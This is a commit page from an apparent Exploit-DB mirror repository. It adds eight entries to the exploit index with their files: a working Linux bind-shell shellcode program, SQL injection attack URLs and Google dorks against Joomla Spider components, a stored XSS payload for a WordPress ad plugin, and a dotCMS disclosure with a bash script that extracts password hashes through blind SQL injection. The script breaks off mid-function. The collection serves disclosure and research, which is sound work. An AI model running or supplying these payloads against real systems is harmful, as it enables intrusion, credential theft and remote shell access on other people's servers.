bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-02-17

Browse source 
8 new exploits

Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)

Joomla! Component 'com_spidercalendar' - SQL Injection
Joomla! Component Spider Calendar - SQL Injection

Joomla! Component 'com_spidercatalog' - 'Product_ID' Parameter SQL Injection
Joomla! Component Spider Catalog 1.1 - 'Product_ID' Parameter SQL Injection

Joomla! Component 'com_spidercalendar' - 'date' Parameter Blind SQL Injection
Joomla! Component Spider Calendar - 'date' Parameter Blind SQL Injection

Joomla! Component 'com_spidercalendar' 3.2.6 - SQL Injection
Joomla! Component Spider Calendar 3.2.6 - SQL Injection

Joomla! Component 'com_spidercontacts' 1.3.6 - 'contacts_id' Parameter SQL Injection
Joomla! Component Spider Contacts 1.3.6 - 'contacts_id' Parameter SQL Injection

Joomla! Component 'com_spiderfaq' - SQL Injection
Joomla! Component Spider FAQ - SQL Injection
Joomla! Component Spider Calendar Lite 3.2.16 - SQL Injection
Joomla! Component Spider Catalog Lite 1.8.10 - SQL Injection
Joomla! Component Spider Facebook 1.6.1 - SQL Injection
Joomla! Component Spider FAQ Lite 1.3.1 - SQL Injection
WordPress Plugin Corner Ad 1.0.7 - Cross-Site Scripting
dotCMS 3.6.1 - Blind Boolean SQL Injection
Joomla! Component JEmbedAll 1.4 - SQL Injection
This commit is contained in:
Offensive Security 2017-02-17 05:01:19 +00:00
parent d9f5d919c6
commit 2f2ccec5c2
9 changed files with 682 additions and 6 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

20
files.csv
View file

@ -15896,6 +15896,7 @@ id,file,description,date,author,platform,type,port
41183,platforms/linux/shellcode/41183.c,"Linux - Multi/Dual mode execve(_/bin/sh__ NULL_ 0) Shellcode (37 bytes)",2017-01-29,odzhancode,linux,shellcode,0
41220,platforms/linux/shellcode/41220.c,"Linux - Multi/Dual mode Reverse Shell Shellcode (129 bytes)",2017-02-02,odzhancode,linux,shellcode,0
41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -25777,7 +25778,7 @@ id,file,description,date,author,platform,type,port
20956,platforms/php/webapps/20956.txt,"vBulletin Yet Another Awards System 4.0.2 - SQL Injection",2012-08-31,Backsl@sh/Dan,php,webapps,0
20959,platforms/windows/webapps/20959.py,"OTRS Open Technology Real Services 3.1.8 / 3.1.9 - Cross-Site Scripting",2012-08-31,"Mike Eduard",windows,webapps,0
20981,platforms/php/webapps/20981.txt,"SugarCRM Community Edition 6.5.2 (Build 8410) - Multiple Vulnerabilities",2012-09-01,"Brendan Coles",php,webapps,0
20983,platforms/php/webapps/20983.pl,"Joomla! Component 'com_spidercalendar' - SQL Injection",2012-09-01,D4NB4R,php,webapps,0
20983,platforms/php/webapps/20983.pl,"Joomla! Component Spider Calendar - SQL Injection",2012-09-01,D4NB4R,php,webapps,0
20987,platforms/asp/webapps/20987.txt,"Citrix Nfuse 1.51 - Webroot Disclosure",2001-07-02,sween,asp,webapps,0
20995,platforms/php/webapps/20995.txt,"Cobalt Qube Webmail 1.0 - Directory Traversal",2001-07-05,kf,php,webapps,0
20996,platforms/php/webapps/20996.txt,"Basilix Webmail 1.0 - File Disclosure",2001-07-06,"karol _",php,webapps,0
@ -26201,7 +26202,7 @@ id,file,description,date,author,platform,type,port
22396,platforms/php/webapps/22396.txt,"WordPress Plugin bbPress - Multiple Vulnerabilities",2012-11-01,Dark-Puzzle,php,webapps,0
22398,platforms/php/webapps/22398.php,"Invision Power Board (IP.Board) 3.3.4 - 'Unserialize()' PHP Code Execution",2012-11-01,EgiX,php,webapps,0
22399,platforms/php/webapps/22399.txt,"Endpoint Protector 4.0.4.2 - Multiple Persistent Cross-Site Scripting",2012-11-01,"CYBSEC Labs",php,webapps,0
22403,platforms/php/webapps/22403.txt,"Joomla! Component 'com_spidercatalog' - 'Product_ID' Parameter SQL Injection",2012-11-01,D4NB4R,php,webapps,0
22403,platforms/php/webapps/22403.txt,"Joomla! Component Spider Catalog 1.1 - 'Product_ID' Parameter SQL Injection",2012-11-01,D4NB4R,php,webapps,0
22405,platforms/php/webapps/22405.txt,"MyBB Follower User Plugin - SQL Injection",2012-11-01,Zixem,php,webapps,0
22408,platforms/cgi/webapps/22408.txt,"Planetmoon - Guestbook Clear Text Password Retrieval",2003-03-21,subj,cgi,webapps,0
22411,platforms/php/webapps/22411.txt,"PHP-Nuke 5.6/6.x - banners.php Banner Manager Password Disclosure",2003-03-22,frog,php,webapps,0
@ -26704,7 +26705,7 @@ id,file,description,date,author,platform,type,port
23774,platforms/php/webapps/23774.txt,"YaBB SE 1.5.x - Arbitrary File Deletion",2004-03-01,"Alnitak and BackSpace",php,webapps,0
23775,platforms/php/webapps/23775.txt,"YaBB SE 1.5.x - Multiple Parameter SQL Injection",2004-03-01,"Alnitak and BackSpace",php,webapps,0
23781,platforms/php/webapps/23781.txt,"MyBB 1.6.9 - 'editpost.php posthash' Time Based SQL Injection",2012-12-31,"Joshua Rogers",php,webapps,0
23782,platforms/php/webapps/23782.txt,"Joomla! Component 'com_spidercalendar' - 'date' Parameter Blind SQL Injection",2012-12-31,Red-D3v1L,php,webapps,0
23782,platforms/php/webapps/23782.txt,"Joomla! Component Spider Calendar - 'date' Parameter Blind SQL Injection",2012-12-31,Red-D3v1L,php,webapps,0
24047,platforms/php/webapps/24047.txt,"Protector System 1.15 b1 - 'index.php' SQL Injection",2004-04-23,waraxe,php,webapps,0
24048,platforms/php/webapps/24048.txt,"Protector System 1.15 - blocker_query.php Multiple Parameter Cross-Site Scripting",2004-04-23,waraxe,php,webapps,0
24046,platforms/php/webapps/24046.txt,"Fusionphp Fusion News 3.6.1 - Cross-Site Scripting",2004-04-23,DarkBicho,php,webapps,0
@ -33630,7 +33631,7 @@ id,file,description,date,author,platform,type,port
34565,platforms/php/webapps/34565.txt,"NuSOAP 0.9.5 - 'nusoap.php' Cross-Site Scripting",2010-09-03,"Bogdan Calin",php,webapps,0
34578,platforms/php/webapps/34578.txt,"WordPress Theme Acento - 'view-pdf.php file Parameter' Arbitrary File Download",2014-09-08,alieye,php,webapps,80
34581,platforms/php/webapps/34581.txt,"Zen Cart 1.5.3 - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80
34571,platforms/php/webapps/34571.py,"Joomla! Component 'com_spidercalendar' 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0
34571,platforms/php/webapps/34571.py,"Joomla! Component Spider Calendar 3.2.6 - SQL Injection",2014-09-08,"Claudio Viviani",php,webapps,0
34572,platforms/php/webapps/34572.txt,"WordPress Plugin Bulk Delete Users by Email 1.0 - Cross-Site Request Forgery",2014-09-08,"Fikri Fadzil",php,webapps,0
34580,platforms/php/webapps/34580.txt,"phpMyFAQ 2.8.x - Multiple Vulnerabilities",2014-09-08,smash,php,webapps,80
34579,platforms/php/webapps/34579.txt,"vBulletin 5.1.x - Persistent Cross-Site Scripting",2014-09-08,smash,php,webapps,80
@ -33669,7 +33670,7 @@ id,file,description,date,author,platform,type,port
34620,platforms/php/webapps/34620.txt,"PaysiteReviewCMS - 'image.php' Cross-Site Scripting",2010-09-14,"Valentin Hoebel",php,webapps,0
34751,platforms/hardware/webapps/34751.pl,"ZYXEL Prestig P-660HNU-T1 - ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80
34624,platforms/php/webapps/34624.txt,"OroCRM - Persistent Cross-Site Scripting",2014-09-11,Provensec,php,webapps,80
34625,platforms/php/webapps/34625.py,"Joomla! Component 'com_spidercontacts' 1.3.6 - 'contacts_id' Parameter SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80
34625,platforms/php/webapps/34625.py,"Joomla! Component Spider Contacts 1.3.6 - 'contacts_id' Parameter SQL Injection",2014-09-11,"Claudio Viviani",php,webapps,80
34626,platforms/ios/webapps/34626.txt,"Photorange 1.0 iOS - File Inclusion",2014-09-11,Vulnerability-Lab,ios,webapps,9900
34627,platforms/ios/webapps/34627.txt,"ChatSecure IM 2.2.4 iOS - Persistent Cross-Site Scripting",2014-09-11,Vulnerability-Lab,ios,webapps,0
34628,platforms/php/webapps/34628.txt,"Santafox 2.0.2 - 'search' Parameter Cross-Site Scripting",2010-09-06,"High-Tech Bridge SA",php,webapps,0
@ -34827,7 +34828,7 @@ id,file,description,date,author,platform,type,port
36461,platforms/php/webapps/36461.txt,"Social Network Community 2 - 'userID' Parameter SQL Injection",2011-12-17,Lazmania61,php,webapps,0
36462,platforms/php/webapps/36462.txt,"Video Community Portal - 'userID' Parameter SQL Injection",2011-12-18,Lazmania61,php,webapps,0
36463,platforms/php/webapps/36463.txt,"Telescope 0.9.2 - Markdown Persistent Cross-Site Scripting",2015-03-21,shubs,php,webapps,0
36464,platforms/php/webapps/36464.txt,"Joomla! Component 'com_spiderfaq' - SQL Injection",2015-03-22,"Manish Tanwar",php,webapps,0
36464,platforms/php/webapps/36464.txt,"Joomla! Component Spider FAQ - SQL Injection",2015-03-22,"Manish Tanwar",php,webapps,0
36466,platforms/php/webapps/36466.txt,"WordPress Plugin Marketplace 2.4.0 - Arbitrary File Download",2015-03-22,"Kacper Szurek",php,webapps,0
36468,platforms/php/webapps/36468.txt,"PHP Booking Calendar 10e - 'page_info_message' Parameter Cross-Site Scripting",2011-12-19,G13,php,webapps,0
36469,platforms/php/webapps/36469.txt,"Joomla! Component 'com_tsonymf' - 'idofitem' Parameter SQL Injection",2011-12-20,CoBRa_21,php,webapps,0
@ -37288,3 +37289,10 @@ id,file,description,date,author,platform,type,port
41361,platforms/hardware/webapps/41361.txt,"Trend Micro InterScan Web Security Virtual Appliance (IWSVA) 6.5 - Multiple Vulnerabilities",2016-11-28,SlidingWindow,hardware,webapps,0
41362,platforms/php/webapps/41362.txt,"Joomla! Component JoomBlog 1.3.1 - SQL Injection",2017-02-15,"Ihsan Sencan",php,webapps,0
41368,platforms/php/webapps/41368.txt,"Joomla! Component JSP Store Locator 2.2 - 'id' Parameter SQL Injection",2017-02-15,"Ihsan Sencan",php,webapps,0
41371,platforms/php/webapps/41371.txt,"Joomla! Component Spider Calendar Lite 3.2.16 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps,0
41372,platforms/php/webapps/41372.txt,"Joomla! Component Spider Catalog Lite 1.8.10 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps,0
41373,platforms/php/webapps/41373.txt,"Joomla! Component Spider Facebook 1.6.1 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps,0
41374,platforms/php/webapps/41374.txt,"Joomla! Component Spider FAQ Lite 1.3.1 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps,0
41376,platforms/php/webapps/41376.txt,"WordPress Plugin Corner Ad 1.0.7 - Cross-Site Scripting",2017-02-16,"Atik Rahman",php,webapps,0
41377,platforms/php/webapps/41377.sh,"dotCMS 3.6.1 - Blind Boolean SQL Injection",2017-02-16,"Ben Nott",php,webapps,80
41378,platforms/php/webapps/41378.txt,"Joomla! Component JEmbedAll 1.4 - SQL Injection",2017-02-16,"Ihsan Sencan",php,webapps,0

Can't render this file because it is too large.

194
platforms/linux/shellcode/41375.c Executable file
View file

@ -0,0 +1,194 @@
/**
Copyright © 2017 Odzhan. All Rights Reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The name of the author may not be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/mman.h>
// bind shell for 32 and 64-bit Linux
//
#define BS_SIZE 156
char BS[] = {
/* 0000 */ "\xb8\xfd\xff\xfb\x2d" /* mov eax, 0x2dfbfffd */
/* 0005 */ "\xbb\xff\xff\xff\xff" /* mov ebx, 0xffffffff */
/* 000A */ "\xf7\xd0" /* not eax */
/* 000C */ "\xf7\xd3" /* not ebx */
/* 000E */ "\x50" /* push rax */
/* 000F */ "\x50" /* push rax */
/* 0010 */ "\x54" /* push rsp */
/* 0011 */ "\x5f" /* pop rdi */
/* 0012 */ "\xab" /* stosd */
/* 0013 */ "\x93" /* xchg ebx, eax */
/* 0014 */ "\xab" /* stosd */
/* 0015 */ "\x54" /* push rsp */
/* 0016 */ "\x5d" /* pop rbp */
/* 0017 */ "\x31\xc0" /* xor eax, eax */
/* 0019 */ "\x99" /* cdq */
/* 001A */ "\xb0\x67" /* mov al, 0x67 */
/* 001C */ "\x6a\x01" /* push 0x1 */
/* 001E */ "\x5e" /* pop rsi */
/* 001F */ "\x6a\x02" /* push 0x2 */
/* 0021 */ "\x5f" /* pop rdi */
/* 0022 */ "\x48\x75\x24" /* jnz 0x49 */
/* 0025 */ "\xb0\x29" /* mov al, 0x29 */
/* 0027 */ "\x0f\x05" /* syscall */
/* 0029 */ "\x97" /* xchg edi, eax */
/* 002A */ "\x55" /* push rbp */
/* 002B */ "\x5e" /* pop rsi */
/* 002C */ "\xb2\x10" /* mov dl, 0x10 */
/* 002E */ "\xb0\x31" /* mov al, 0x31 */
/* 0030 */ "\x0f\x05" /* syscall */
/* 0032 */ "\x50" /* push rax */
/* 0033 */ "\x5e" /* pop rsi */
/* 0034 */ "\xb0\x32" /* mov al, 0x32 */
/* 0036 */ "\x0f\x05" /* syscall */
/* 0038 */ "\xb0\x2b" /* mov al, 0x2b */
/* 003A */ "\x0f\x05" /* syscall */
/* 003C */ "\x97" /* xchg edi, eax */
/* 003D */ "\x96" /* xchg esi, eax */
/* 003E */ "\xb0\x21" /* mov al, 0x21 */
/* 0040 */ "\x0f\x05" /* syscall */
/* 0042 */ "\x83\xee\x01" /* sub esi, 0x1 */
/* 0045 */ "\x79\xf7" /* jns 0x3e */
/* 0047 */ "\xeb\x2f" /* jmp 0x78 */
/* 0049 */ "\x56" /* push rsi */
/* 004A */ "\x5b" /* pop rbx */
/* 004B */ "\x52" /* push rdx */
/* 004C */ "\x53" /* push rbx */
/* 004D */ "\x57" /* push rdi */
/* 004E */ "\x54" /* push rsp */
/* 004F */ "\x59" /* pop rcx */
/* 0050 */ "\xcd\x80" /* int 0x80 */
/* 0052 */ "\x97" /* xchg edi, eax */
/* 0053 */ "\x5b" /* pop rbx */
/* 0054 */ "\x5e" /* pop rsi */
/* 0055 */ "\x6a\x10" /* push 0x10 */
/* 0057 */ "\x55" /* push rbp */
/* 0058 */ "\x57" /* push rdi */
/* 0059 */ "\xb0\x66" /* mov al, 0x66 */
/* 005B */ "\x89\xe1" /* mov ecx, esp */
/* 005D */ "\xcd\x80" /* int 0x80 */
/* 005F */ "\x89\x51\x04" /* mov [rcx+0x4], edx */
/* 0062 */ "\xb0\x66" /* mov al, 0x66 */
/* 0064 */ "\xb3\x04" /* mov bl, 0x4 */
/* 0066 */ "\xcd\x80" /* int 0x80 */
/* 0068 */ "\xb0\x66" /* mov al, 0x66 */
/* 006A */ "\x43\xcd\x80" /* int 0x80 */
/* 006D */ "\x6a\x02" /* push 0x2 */
/* 006F */ "\x59" /* pop rcx */
/* 0070 */ "\x93" /* xchg ebx, eax */
/* 0071 */ "\xb0\x3f" /* mov al, 0x3f */
/* 0073 */ "\xcd\x80" /* int 0x80 */
/* 0075 */ "\x49\x79\xf9" /* jns 0x71 */
/* 0078 */ "\x99" /* cdq */
/* 0079 */ "\x31\xf6" /* xor esi, esi */
/* 007B */ "\x50" /* push rax */
/* 007C */ "\x50" /* push rax */
/* 007D */ "\x50" /* push rax */
/* 007E */ "\x54" /* push rsp */
/* 007F */ "\x5b" /* pop rbx */
/* 0080 */ "\x53" /* push rbx */
/* 0081 */ "\x5f" /* pop rdi */
/* 0082 */ "\xc7\x07\x2f\x62\x69\x6e" /* mov dword [rdi], 0x6e69622f */
/* 0088 */ "\xc7\x47\x04\x2f\x2f\x73\x68" /* mov dword [rdi+0x4], 0x68732f2f */
/* 008F */ "\x40\x75\x04" /* jnz 0x96 */
/* 0092 */ "\xb0\x3b" /* mov al, 0x3b */
/* 0094 */ "\x0f\x05" /* syscall */
/* 0096 */ "\x31\xc9" /* xor ecx, ecx */
/* 0098 */ "\xb0\x0b" /* mov al, 0xb */
/* 009A */ "\xcd\x80" /* int 0x80 */
};
void bin2file(void *p, int len)
{
FILE *out = fopen("rs.bin", "wb");
if (out!= NULL)
{
fwrite(p, 1, len, out);
fclose(out);
}
}
void xcode(char *s, int len, uint32_t ip, int16_t port)
{
uint8_t *p;
p=(uint8_t*)mmap (0, len,
PROT_EXEC | PROT_WRITE | PROT_READ,
MAP_ANON | MAP_PRIVATE, -1, 0);
memcpy(p, s, len);
memcpy((void*)&p[3], &port, 2); // set the port
memcpy((void*)&p[6], &ip, 4); // set the ip
//bin2file(p, len);
// execute
((void(*)())p)();
munmap ((void*)p, len);
}
int main(int argc, char *argv[])
{
uint32_t ip = 0;
int16_t port = 0;
if (argc < 2) {
printf ("\nbs_test <port> <optional ip>\n");
return 0;
}
port = atoi(argv[1]);
if (port<0 || port>65535) {
printf ("\ninvalid port specified\n");
return 0;
}
port = htons(port);
// optional ip address?
if (argc > 2) {
ip = inet_addr(argv[2]);
}
// invert both to mask null bytes.
// obviously no rigorous checking here
ip = ~ip;
port = ~port;
xcode (BS, BS_SIZE, ip, port);
return 0;
}

19
platforms/php/webapps/41371.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Joomla! Component Spider Calendar Lite v3.2.16 - SQL Injection
# Google Dork: inurl:index.php?option=com_spidercalendar
# Date: 16.02.2017
# Vendor Homepage: http://web-dorado.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/calendars-a-events/events/spider-calendar-lite/
# Demo: http://demo.web-dorado.com/spider-calendar.html
# Version: 3.2.16
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_spidercalendar&view=spidercalendar&calendar_id=[SQL]
# http://localhost/[PATH]/index.php?option=com_spidercalendar&view=spidercalendar&calendar_id=1&module_id=92&date92=2017-02-3&cat_ids=&Itemid=[SQL]
# Etc...
# # # # #

19
platforms/php/webapps/41372.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Joomla! Component Spider Catalog Lite v1.8.10 - SQL Injection
# Google Dork: inurl:index.php?option=com_spidercatalog
# Date: 16.02.2017
# Vendor Homepage: http://web-dorado.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/spider-catalog-lite/
# Demo: http://demo.web-dorado.com/spider-catalog.html
# Version: 1.8.10
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_spidercatalog&product_id=40&view=showproduct&page_num=1&back=1&show_category_details=0&display_type=list&show_subcategories=0&show_subcategories_products=0&show_products=1&select_categories=0&Itemid=[SQL]
#
http://localhost/[PATH]/index.php?option=com_spidercatalog&view=spidercatalog&select_categories=[SQL]&show_category_details=1&display_type=cell&show_subcategories=1
# # # # #

17
platforms/php/webapps/41373.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: Joomla! Component Spider Facebook v1.6.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_spiderfacebook
# Date: 16.02.2017
# Vendor Homepage: http://web-dorado.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/social-web/social-display/spider-facebook/
# Demo: http://demo.web-dorado.com/spider-facebook.html
# Version: 1.6.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_spiderfacebook&task=loginwith&name=[SQL]
# # # # #

17
platforms/php/webapps/41374.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: Joomla! Component Spider FAQ Lite v1.3.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_spiderfaq
# Date: 16.02.2017
# Vendor Homepage: http://web-dorado.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/directory-a-documentation/faq/spider-faq-lite/
# Demo: http://demo.web-dorado.com/spider-faq.html
# Version: 1.3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=1&searchform=1&expand=0&Itemid=[SQL]
# # # # #

44
platforms/php/webapps/41376.txt Executable file
View file

@ -0,0 +1,44 @@
# Exploit Title: Authorized Stored XSS at WordPress Corner-Ad plugin.
# Google Dork: inurl:/wp-content/plugins/corner-ad
# Date: 16-02-17
# Exploit Author: Atik Rahman
# Vendor Homepage: https://wordpress.org/plugins/corner-ad/
# Software Link: https://downloads.wordpress.org/plugin/corner-ad.zip
# Version: 1.0.7
# Tested on: Firefox 44, Windows10
Vendor Description
---------------------
*Corner Ad* is a plugin which display you ads in a corner of your
WordPress website page.
The Plugin has 1,000+ active install.
Stored XSS in Ad Name
----------------------
Ad name input fields aren't properly escaped. This
could lead to an XSS attack that could possibly affect
administrators,users,editor.
1. Go to http://localhost/wp-admin/options-general.php?page=corner-ad.php
2. Click on create new Add button.
3. And Use Ad name as "/><svg/onload=prompt(document.domain)> *Fill
the other field.
4.Now Click on save corner Add button when it's add a new add go to the
http://localhost/wp-admin/options-general.php?page=corner-ad.php
for corner add list. And now Your xss will
be executed.
5. If a normal editor,author visit the corner add list page xss will
effect them also.

333
platforms/php/webapps/41377.sh Executable file
View file

@ -0,0 +1,333 @@
: '
# Blind Boolean SQL Injection in dotCMS <= 3.6.1 (CVE-2017-5344)
## Product Description
dotCMS is a scalable, java based, open source content management system
(CMS) that has been designed to manage and deliver personalized, permission
based content experiences across multiple channels. dotCMS can serve as the
plaform for sites, mobile apps, mini-sites, portals, intranets or as a
headless CMS (content is consumed via RESTful APIs). dotCMS is used
everywhere, from running small sites to powering multi-node installations
for governemnts, Fortune 100 companies, Universities and Global Brands. A
dotCMS environment can scale to support hundreds of editors managing
thousands of sites with millions of content objects.
## Vulnerability Type
Blind Boolean SQL injection
## Vulnerability Description
dotCMS versions up to 3.6.1 (and possibly others) are vulnerable to blind
boolean SQL injection in the q and inode parameters at the
/categoriesServlet path. This servlet is a remotely accessible,
unauthenticated function of default dotCMS installations and can be
exploited to exfiltrate sensitive information from databases accessible to
the DMBS user configured with the product.
Exploitation of the vulnerability is limited to the MySQL DMBS in 3.5 -
3.6.1 as SQL escaping controls were added to address a similar
vulnerability discovered in previous versions of the product. The means of
bypassing these features which realise this vulnerability have only been
successfully tested with MySQL 5.5, 5.6 and 5.7 and it is believed other
DMBSes are not affected. Versions prior to 3.6 do not have these controls
and can be exploited directly on a greater number of paired DMBSes.
PostgreSQL is vulnerable in all described versions of dotCMS when
PostgreSQL standard_confirming_strings setting is disabled (enabled by
default).
The vulnerability is the result of string interpolation and directly SQL
statement execution without sanitising user input. The intermediate
resolution for a previous SQLi vulnerability was to whitelist and partially
filter user input before interpolation. This vulnerability overcomes this
filtering to perform blind boolean SQL injection. The resolution to this
vulnerability was to implement the use of prepared statements in the
affected locations.
This vulnerability has been present in dotCMS since at least since version
3.0.
## Exploit
A proof of concept is available here:
https://github.com/xdrr/webapp-exploits/tree/master/vendors/dotcms/2017.01.blind-sqli
## Versions
dotCMS <= 3.3.2 and MYSQL, MSSQL, H2, PostgreSQL
dotCMS 3.5 - 3.6.1 and (MYSQL or PostgreSQL w/ standard_confirming_strings
disabled)
## Attack Type
Unauthenticated, Remote
## Impact
The SQL injection vulnerability can be used to exfiltrate sensitive
information from the DBMS used with dotCMS. Depending of the DBMS
configuration and type, the issue could be as severe as establishing a
remote shell (such as by using xp_exec on MSSQL servers) or in the most
limited cases, restricted only to exfiltration of data in dotCMS database
tables.
## Credit
This vulnerability was discovered by Ben Nott <pajexali@gmail.com>.
Credit goes to Erlar Lang for discovering similar SQL injection
vulnerabilities in nearby code and for inspiring this discovery.
## Disclosure Timeline
* Jan 2, 2017 - Issue discovered.
* Jan 2, 2017 - Vendor advised of discovery and contact requested for
full disclosure.
* Jan 4, 2017 - Provided full disclosure to vendor.
* Jan 5, 2017 - Vendor acknowledged disclosure and confirmed finding
validity.
* Jan 14, 2017 - Vendor advised patch developed and preparing for release.
* Jan 24, 2017 - Vendor advised patching in progress.
* Feb 15, 2017 - Vendor advises ready for public disclosure.
## References
Vendor advisory: http://dotcms.com/security/SI-39
CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-5344
'
#!/bin/bash
#
# Dump password hashes from dotCMS <= 3.6.1 using blind boolean SQL injection.
# CVE: CVE-2017-5344
# Author: Ben Nott <pajexali@gmail.com>
# Date: January 2017
#
# Note this exploit is tuned for MySQL backends but can be adapted
# for other DMBS's.
show_usage() {
echo "Usage $0 [target]"
echo
echo "Where:"
echo -e "target\t...\thttp://target.example.com (no trailing slash, port optional)"
echo
echo "For example:"
echo
echo "$0 http://www.examplesite.com"
echo "$0 https://www.mycmssite.com:9443"
echo
exit 1
}
test_exploit() {
target=$1
res=$(curl -k -s -X 'GET' \
-H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0' -H 'Upgrade-Insecure-Requests: 1' \
"${target}/categoriesServlet?q=%5c%5c%27")
if [ $? -ne 0 ];
then
echo "Failed to connect. Check host and try again!"
exit 1
fi
if [ -z "$res" ];
then
echo "The target appears vulnerable. We're good to go!"
else
echo "The target isn't vulnerable."
exit 1
fi
}
dump_char() {
target=$1
char=$2
database=$3
index=$4
offset=$5
column=$6
avg_delay=$7
if [ -z "$offset" ];
then
offset=1
fi
if [[ $char != *"char("* ]];
then
char="%22${char}%22"
fi
if [ -z "$column" ];
then
column="password_"
fi
# Controls the avg delay of a FALSE
# request
if [ -z "$avg_delay" ];
then
avg_delay="0.100"
fi
res=$(curl -k -sS \
-w " %{time_total}" \
-H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0' -H 'Upgrade-Insecure-Requests: 1' \
"${target}/categoriesServlet?q=%5c%5c%27)+OR%2f%2a%2a%2f(SELECT(SUBSTRING((SELECT(${column})FROM(${database}.user_)LIMIT%2f%2a%2a%2f${index},1),${offset},1)))LIKE+BINARY+${char}%2f%2a%2a%2fORDER+BY+category.sort_order%23")
data=$(echo $res | awk '{print $1}')
rtt=$(echo $res | awk '{print $2}')
# Calculate boolean based on time delay and
# data presence.
has_delay=$(echo "${rtt}>${avg_delay}" | bc -l)
if [ ! -z "$data" ];
then
if [ $has_delay -eq 1 ];
then
echo "$char"
fi
fi
}
testdb() {
target=$1
res=$(dump_char $target 1 "dotcms" 1 1)
if [ ! -z "$res" ];
then
echo "dotcms"
else
res=$(dump_char $target 1 "dotcms2")
if [ ! -z "$res" ];
then
echo "dotcms2"
fi
fi
}
convert_char() {
char=$1
conv="$char"
if [ "$char" == "char(58)" ];
then
conv=":"
elif [ "$char" == "char(47)" ];
then
conv="/"
elif [ "$char" == "char(61)" ];
then
conv="="
elif [ "$char" == "char(45)" ];
then
conv="-"
fi
echo -n "$conv"
}
a2chr() {
a=$1
printf 'char(%02d)' \'$a
}
n2chr() {
n=$1
printf 'char(%d)' $n
}
chr2a() {
chr=$1
chr=$(echo $chr | sed -e 's/char(//g' -e 's/)//g')
chr=`printf \\\\$(printf '%03o' $chr)`
